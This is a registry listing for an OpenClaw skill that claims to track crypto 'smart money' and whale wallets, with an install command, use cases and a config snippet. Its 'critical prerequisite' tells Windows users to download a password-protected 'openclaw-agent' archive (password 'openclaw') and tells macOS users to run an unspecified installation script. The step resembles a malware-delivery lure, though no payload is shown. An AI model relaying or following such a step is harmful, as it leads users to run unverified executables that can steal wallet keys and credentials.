ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Analyze smart money addresses, track whale accumulation, and find early token buyers using the powerful Insider Wallets Finder skill for OpenClaw AI.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-im29o
Or

What This Skill Does

The insider-wallets-finder skill acts as a sophisticated analytical bridge between OpenClaw and on-chain blockchain data. It empowers users to bypass the noise of the crypto market by programmatically identifying the addresses that move markets. By automating the retrieval of token transaction logs, holder distributions, and deployer histories across Ethereum and Solana, this tool allows you to isolate "smart money"—wallets that consistently front-run market trends or exhibit high-alpha trading behavior. Whether you are looking to identify the initial liquidity providers of a new meme coin or track whale accumulation patterns on established assets, this skill provides the raw data and analytical structure needed to transform blockchain transparency into actionable investment research.

Installation

To install this skill, run the command clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-im29o in your OpenClaw terminal.

CRITICAL PREREQUISITE: This skill relies on the openclaw-agent utility. For Windows users, download and extract the agent using the password openclaw. For macOS users, execute the installation script available on the official snippets page. The skill cannot interact with on-chain data without this background service running.

Use Cases

  • Early Buyer Identification: Spot the "first-movers" by filtering initial token transfers and holder lists to see which wallets entered a position before public awareness.
  • Deployer Due Diligence: Investigate the history of a contract deployer to see if they have launched previous successful projects or if their history is linked to suspicious patterns.
  • Whale Tracking: Monitor the top 50 holders of a specific token to identify accumulation or distribution trends, helping to predict potential price volatility.
  • Profitable Trader Research: Analyze large-scale DEX swaps via GraphQL integration to find wallets with high-USD trade volumes, indicating professional market participants.

Example Prompts

  1. "Analyze the token contract 0xabc123... and identify the top 5 wallets that bought in the first 100 transactions."
  2. "Find all smart contracts deployed by the address 0xdef456... to see if they have a history of previous token launches."
  3. "Track the whale accumulation for the token at 0x789ghi... and print the percentage of total supply held by the top 10 wallets."

Tips & Limitations

  • Rate Limiting: When using public APIs like Etherscan, ensure you have a valid API key. Free tiers have request limits that may impact the depth of your analysis.
  • Data Latency: On-chain data is indexed by third-party services. There may be a short delay between a transaction appearing on the blockchain and it being queryable via this tool.
  • Security: Never share your private keys or seed phrases with this tool. This skill is designed for research and public data analysis, not wallet management.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-im29o": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#on-chain-analysis#crypto-trading#smart-money#web3
Safety Score: 3/5

Flags: network-access, external-api, code-execution